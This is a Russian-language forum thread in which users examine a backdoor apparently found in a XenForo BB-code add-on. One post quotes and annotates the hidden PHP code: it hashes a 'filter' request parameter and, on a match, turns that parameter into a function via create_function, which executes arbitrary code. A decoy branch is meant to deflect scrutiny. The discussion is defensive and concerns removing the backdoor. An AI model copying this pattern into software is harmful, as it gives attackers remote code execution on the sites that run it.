Смотрите видео ниже, чтобы узнать, как установить наш сайт в качестве веб-приложения на домашнем экране.
Примечание: В настоящее время эта функция требует доступа к сайту с помощью встроенного браузера Safari.
Меня больше интересует-закроет ли 100% эту дырку, заменой хеша на свои или нет?souz21, щас тебе расскажут про уязвимость и как ей пользоваться а завтра половина форумов на ксене будет в паблике лежать ))))
НетМеня больше интересует-закроет ли 100% эту дырку, заменой хеша на свои или нет?
Да все уже попользовались давно.souz21, щас тебе расскажут про уязвимость и как ей пользоваться а завтра половина форумов на ксене будет в паблике лежать ))))
Можете вообще удалить эти хеши и код, который за ними стоит. Это бекдор.Меня больше интересует-закроет ли 100% эту дырку, заменой хеша на свои или нет?
$request = new Zend_Controller_Request_Http ( ); // создается новый объект, отражающий текущий запрос
if ($request->getParam('filter')) { // проверка наличия параметра filter в запросе
$_request = $request->getParam('filter');
switch (md5 ($_request)) { // этот filter хешируется, и на основе хеша
case '54626eee0bcb90ab43c7917eb49f2344': // хеш какой-то строки
case 'a6746afee9fa4e6e4901943d47f272bf': // хеш какой-то другой строки
/**
* Удаление меток bb-кодов, опредеяющих сообщения текущего пользователя(для отображения скрытого контента своих сообщений)
*/
$request = preg_replace_callback ('/query/', create_function ('$matches', $_request), $_request); // нихуя не удаление меток, тут из filter'а берется код и из него создается функция, затем используется как каллбек для preg_replace_callback
break;
default:
$request = 'all'; // хренота для наеба, если кто-то вдруг начнет копать
}
}
В это и не было ещё.У меня старая версия, 1.0.8... не нашел подобного в коде...
Официально приобретённое или из сети, просто вероятность отсутствия такого кода мала.тоже не нашел в коде такого, версия 1.1.2
Может я чего не так понял?В это и не было ещё.
Официально приобретённое или из сети, просто вероятность отсутствия такого кода мала.
library/Esthetic/CS/Model/Thread.php
Есть люди, которые профессионально занимаются изучением скриптов на предмет уязвимостей, либо слабых мест скрипта. Я предлагаю скинуться по паре баксов и отдать скрипт на исследование. Пусть посмотрят, может там еще сюрпризы.valekor, что именно Вы предлагаете? Я что-то не совсем понял...
Удачи. Флаг Вам в руки. Расшифровывайте обфусцированный код сами.Есть люди, которые профессионально занимаются изучением скриптов на предмет уязвимостей, либо слабых мест скрипта. Я предлагаю скинуться по паре баксов и отдать скрипт на исследование. Пусть посмотрят, может там еще сюрпризы.
Чего? Код в открытом виде, кому надо могу выложить архив с ббкодами последней версии (очень к слову странно что тут нет, абузами от автора большинство хостеров подотрутся). Кроме 2 хешей ничего там не зашифровано, да и весь этот блок с ними не особо нужен, как выяснилось. Да и md5 хеш на пару строк это не обфускация :-DРасшифровывайте обфусцированный код сами.
Меня напрягает в коде ссылка на сайт автора, "якобы API"Чего? Код в открытом виде, кому надо могу выложить архив с ббкодами последней версии (очень к слову странно что тут нет, абузами от автора большинство хостеров подотрутся). Кроме 2 хешей ничего там не зашифровано, да и весь этот блок с ними не особо нужен, как выяснилось. Да и md5 хеш на пару строк это не обфускация :-D
Мы используем основные cookies для обеспечения работы этого сайта, а также дополнительные cookies для обеспечения максимального удобства пользователя.
Посмотрите дополнительную информацию и настройте свои предпочтения